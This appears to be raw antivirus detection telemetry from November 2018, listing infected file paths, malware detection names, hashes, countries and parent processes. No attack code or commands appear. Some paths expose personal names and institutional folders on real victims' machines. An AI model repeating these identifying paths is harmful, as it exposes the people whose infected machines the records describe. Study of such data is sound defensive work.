  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:38:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cdnlink.vir', filepath='C:\\Program Files (x86)\\CdnApp\\Cdnlink\\Cdnlink.VIR', filesize=192000, name='ADWARE/PublishStream.ckypp.#M1.#R1'), hash='059bc6196102546a84fc675ca48cc855ce884e706b05e8e836f96ed92679dd05', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T00:30:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183909-1ea1f33f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41c160bd\\AVSCAN-20181101-183824-1761BAB8\\AVSCAN-20181101-183909-1EA1F33F', filesize=2048000, name='TR/RedCap.gblsf.#M1.#R1'), hash='850d55400b4b6ec3ddcf70a5fae5cbff91c81b8dcf9fff2bc47717cf99dbba48', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T16:39:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094401-b5e0ccdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125245e\\AVSCAN-20181101-093753-848BD869\\AVSCAN-20181101-094401-B5E0CCDB', filesize=576000, name='SPR/Mimikatz.32bcd1.#M1.#R1'), hash='32bcd17d3c8a769fa15021977324aaa7b624437cd03266a3614e54bbe330182c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:44:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-001051-9ffb1d1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234829-DD2407AD\\AVSCAN-20181102-001051-9FFB1D1C', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:10:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002443-47054d3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002443-47054D3E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keygen64bit.exe', filepath='G:\\USUARIO\\Documents\\KeyGen 64 bit\\keygen64bit.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='4389be082cffefeff7ecc66b7204a34ff7bb13a22af1e5c10c19226fc063705e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:09:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002331-3f3481c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002331-3F3481C0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b44b1', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b44b1', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:55:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130246-272e89dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a10a9518\\AVSCAN-20181101-130225-24C1F1FB\\AVSCAN-20181101-130246-272E89DD', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:02:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122543-ca7f8f58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a1a6565\\AVSCAN-20181101-122429-BC2F1B60\\AVSCAN-20181101-122543-CA7F8F58', filesize=256000, name='RKit/Agent.marf.#M1.#R1'), hash='829ff334cdcfe87bbe5780fb8e696d8fa45420845c6d50dd1d29d0d2ead41b2a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vc_redist.x86.exe', filepath='C:\\ProgramData\\Package Cache\\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}\\VC_redist.x86.exe', filesize=580000, name='W32/Jeefo.A.#M1.#R1'), hash='a0d3d94a34a990441a66d26bdce8c3489703308a43461a7eebd42ba90b3956cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:45:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095228-5adeea56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095228-5ADEEA56', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:52:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hebisha shaban said.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\HEBISHA SHABAN SAID.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fomer', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fomer', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='9181846258d386386a8495c47d25fa0d650b9c3d89a88aefa19fed328dee4dbe', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:31:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pfi oss 583982.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\PFI OSS 583982.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:18:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-103419-112727f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27d3c769\\AVSCAN-20181101-103330-0B109C9C\\AVSCAN-20181101-103419-112727F7', filesize=256000, name='TR/Qadars.AH.#M1.#R1'), hash='93ba4756d49ef347b1c8bbbcca894c11f724890e65ce09e3cc5ba61f90336a9f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:04:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:10:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='esercizi informatica.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\tutto informatica engim\\ESERCIZI INFORMATICA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:30:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lxpqavbb.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\lXpqAVBb.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsq82D7.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-01T12:58:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:39:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maphwdygbinotm.bat', filepath='E:\\maphwdygbinotm.bat', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212717-0c33c2cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212717-0C33C2CB', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:27:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152018-75ecdf41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152018-75ECDF41', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:20:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered facod', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered facod', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='dc26e9b5291e93bbb8f1e419cf449550fd705fd81d2a415254b31a9604c2a82e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:16:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered rofom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered rofom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='bfc751f56a3d199242f8515475e1705643b8dcd181ca5d4b743dcc7c50ffa4f9', metadata=Row(cmdline='\\\\\\/Q \\\\\\/W', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\MRT.exe', parentsize=None, timestamp='2018-11-01T00:14:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='moduli 2016-2017.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\MODULI 2016-2017.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tesi master.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\TESI MASTER.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182427-23be5544', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182427-23BE5544', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autopatch.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Gamania\\GamaniaSafe\\AutoPatch.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='d56c4ac37710b87ffb319a706ec10b950f7ce93c665dfb216a63ba9cdf62073e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:39:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aapt.exe', filepath='F:\\MI files\\MiPhone_MiFlash\\Note 3 mtk\\XIAOMI_REDMI_NOTE_3_MT6795_Tools_IMEI_REPAIR\\Mediatek_MT6795_Tools_IMEI\\Android\\aapt.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='dca2bb160d80f16bf5405fcf1460a031fe9f96b2ff02036e5b87af892326fb39', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T10:33:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='natali susi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\NATALI SUSI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='coollector movie database 4.2.9 (windows).(incomplete).rar', filepath='\\\\?\\C:\\Users\\X\\Documents\\Usenet.nl\\Virus_X7 Graphics Suite Coreldraw Corel (2014) Build Corelcad - x86x64\\Coollector Movie Database 4.2.9 (Windows).(incomplete).rar', filesize=29184000, name='TR/ATRAPS.Gen.#M300.#R3146'), hash='504655f0c43f81ad2eedb8d5eb3e7aa863818a7612463f00a1b9257f9405d62a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:18:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:13:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files (x86)\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='7a0dcdb58d4e5bbf303af3c6c5f9063ecfeb2e404d5797577234cd26d8be0b56', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='NI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=23040, timestamp='2018-11-04T22:26:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001f491', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f491', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:22:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='7e5c69fbaa6ec52e3826ad9979b886b85c9e2a4e4c57be16d522e30d82a90959', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:59:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002427b', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002427b', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:45:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:31:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163806-565336d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-163806-565336D5', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='07ca3b6da26ae9c96203cb4d52526cf7b817d596125567563074126417ef6f5b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:08:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152151-ab1b0b4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-152116-A748C165\\AVSCAN-20181104-152151-AB1B0B4B', filesize=512000, name='Adware/SpeedBit.ngud.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:21:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:12:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='d:\\برامج\\حســــابات المستشفــــات\\المستشفى\\new folder\\afa\\اوفيس 2007+ تفعيل\\office.en-us\\dwtrig20.exe', filesize=644000, name='W32/Neshta.A.#M1.#R1'), hash='4e0b759f551583c60d2cb6f31e598096af51080dd1f899bf7be069802cd191d0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:30:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered docif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='5d3e1662e81cf3058a2979d5ca569df72fda4aa3b500d2b6d3f3aea6fda7f20a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:36:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msqry32.exe', filepath='C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSQRY32.EXE', filesize=732000, name='W32/Sality.#M1.#R1'), hash='7f52a8e010c576023e63a142ec0259e97e6ee0daa9cdf1e9af316496b8f63e7c', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Avira\\SoftwareUpdater\\Avira.SoftwareUpdater.ServiceHost.exe', parentsize=102816, timestamp='2018-11-04T18:49:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131455-27e18d76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131455-27E18D76', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:14:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='0f905fa19074f5ad6fda3c36358ce9aae29775829eb75ffa88060831bc9ea942', metadata=Row(cmdline='\\\\\\/Embedding', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T04:43:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jbq0bp.dll', filepath='\\?\\C:\\Windows\\jbq0Bp.dll', filesize=192000, name='Adware/ELEX.xjuch.#M1.#R1'), hash='50450cd74f7e00ab23864f3a22f66217446dc76563594c16209c7d84999ca55d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:54:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='backup files 2.zip', filepath='\\\\?\\D:\\HENNES-PC\\Backup Set 2014-11-16 192244\\Backup Files 2014-11-16 192244\\Backup files 2.zip', filesize=183588000, name='PUA/SoftPulse.oann.#M300.#R5714'), hash='204222ab74b713960b9dead892879a4b9fb758baeb5b5f847219dd5e4f42449f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:37:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212613-7068814f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a9ce2c5\\AVSCAN-20181104-212516-6B15C4A4\\AVSCAN-20181104-212613-7068814F', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:26:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:31:45Z'), dt=datetime.date(2018, 11, 4)),
